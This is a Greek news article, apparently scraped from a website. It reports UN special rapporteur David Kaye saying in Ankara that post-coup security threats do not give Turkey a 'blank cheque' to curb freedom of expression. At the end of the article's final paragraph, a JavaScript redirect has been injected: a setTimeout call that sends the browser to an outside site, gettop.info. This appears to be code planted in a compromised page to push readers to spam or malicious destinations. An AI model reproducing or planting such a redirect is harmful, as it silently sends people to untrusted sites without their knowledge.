Ο ΟΗΕ «τραβά το αυτί » στην Άγκυρα για την καταπάτηση των ελευθεριών

0
5

 

Ο ειδικός εισηγητής του ΟΗΕ για την ελευθερία της έκφρασης δήλωσε ότι οι υφιστάμενες απειλές στον τομέα της ασφάλειας δεν δίνουν στην Τουρκία «λευκή επιταγή» για την καταπάτηση των ελευθεριών.

Σε συνέντευξη Τύπου στην Άγκυρα έπειτα από πολυήμερη επίσκεψη στην Τουρκία κατά τη διάρκεια της οποίας κατόρθωσε να συναντηθεί με φυλακισμένους δημοσιογράφους, ο Ντέιβιντ Κέι προχώρησε σε μία σκοτεινή περιγραφή της κατάστασης στην οποία έχει περιέλθει η ελευθερία της έκφρασης στην Τουρκία.

Αναγνωρίζοντας ότι η χώρα βρίσκεται σε ιδιαίτερες συνθήκες μετά το αποτυχημένο πραξικόπημα της 15ης Ιουλίου και ότι βρίσκεται αντιμέτωπη με απειλές που τίθενται από το Ισλαμικό Κράτος και το PKK, ο αξιωματούχος του ΟΗΕ προειδοποίησε ότι «αυτό δεν σημαίνει ότι η κυβέρνηση διαθέτει, κατά κάποιον τρόπο, λευκή επιταγή για να κάνει ό,τι θέλει για την καταστολή της ελευθερίας της έκφρασης».

«Θα έλεγα ότι τα συμπεράσματα στα οποία φθάνω κατά την επίσκεψη αυτή είναι αρκετά ανησυχητικά και αποτυπώνουν αυτό που θεωρώ ότι είναι περιορισμοί της ελευθερίας της έκφρασης και της γνώμης σε ολόκληρη τη χώρα», πρόσθεσε.

«Η ελευθερία της γνώμης δεν πρέπει να υπόκειται σε οποιονδήποτε περιορισμό. […] Διαπιστώσαμε σε όλα τα επίπεδα ότι οι περιορισμοί έχουν αντίκτυπο σε διάφορους τομείς της ζωής στην Τουρκία», συνέχισε. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here